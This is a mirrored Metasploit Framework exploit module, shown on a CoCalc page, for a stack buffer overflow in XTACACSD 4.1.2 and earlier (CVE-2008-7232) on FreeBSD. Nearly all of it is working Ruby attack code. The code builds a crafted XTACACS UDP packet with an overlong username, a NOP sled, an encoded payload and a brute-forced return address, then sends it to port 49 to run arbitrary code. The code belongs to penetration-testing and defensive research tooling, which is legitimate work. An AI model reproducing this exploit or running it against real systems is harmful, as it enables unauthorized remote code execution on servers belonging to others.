Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/freebsd/tacacs/xtacacsd_report.rb
19664 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Udp

10
  include Msf::Exploit::Brute

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'XTACACSD report() Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By

19
          sending a specially crafted XTACACS packet with an overly long

20
          username, an attacker may be able to execute arbitrary code.

21
        },

22
        'Author' => 'MC',

23
        'References' => [

24
          ['CVE', '2008-7232'],

25
          ['OSVDB', '58140'],

26
          ['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'],

27
        ],

28
        'Payload' => {

29
          'Space' => 175,

30
          'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",

31
          'StackAdjustment' => -3500,

32
          'PrependEncoder' => "\x83\xec\x7f",

33
          'DisableNops' => true

34
        },

35
        'Platform' => 'bsd',

36
        'Arch' => ARCH_X86,

37
        'Targets' => [

38
          [

39
            'FreeBSD 6.2-Release Bruteforce',

40
            {

41
              'Bruteforce' =>

42
                  {

43
                    'Start' => { 'Ret' => 0xbfbfea00 },

44
                    'Stop' => { 'Ret' => 0xbfbfef00 },

45
                    'Step' => 24

46
                  }

47
            },

48
          ],

49
        ],

50
        'Privileged' => true,

51
        'DefaultTarget' => 0,

52
        'DisclosureDate' => '2008-01-08',

53
        'Notes' => {

54
          'Stability' => [ CRASH_SERVICE_RESTARTS, ],

55
          'Reliability' => [ REPEATABLE_SESSION, ],

56
          'SideEffects' => [ IOC_IN_LOGS, ]

57
        }

58
      )

59
    )

60


61
    register_options([Opt::RPORT(49)])

62
  end

63


64
  def brute_exploit(address)

65
    connect_udp

66


67
    sploit = "\x80" # Version

68
    sploit << "\x05" # Type: Connect

69
    sploit << "\xff\xff" # Nonce

70
    sploit << "\xff" # Username length

71
    sploit << "\x00" # Password length

72
    sploit << "\x00" # Response

73
    sploit << "\x00" # Reason

74
    sploit << "\xff\xff\xff\xff" # Result 1

75
    sploit << "\xff\xff\xff\xff" # Destination address

76
    sploit << "\xff\xff" # Destination port

77
    sploit << "\xff\xff" # Line

78
    sploit << "\x00\x00\x00\x00" # Result 2

79
    sploit << "\x00\x00" # Result 3

80
    sploit << make_nops(238 - payload.encoded.length)

81
    sploit << payload.encoded + [address['Ret']].pack('V')

82


83
    print_status("Trying target #{target.name} #{'%.8x' % address['Ret']}...")

84
    udp_sock.put(sploit)

85


86
    disconnect_udp

87
  end

88
end

89


90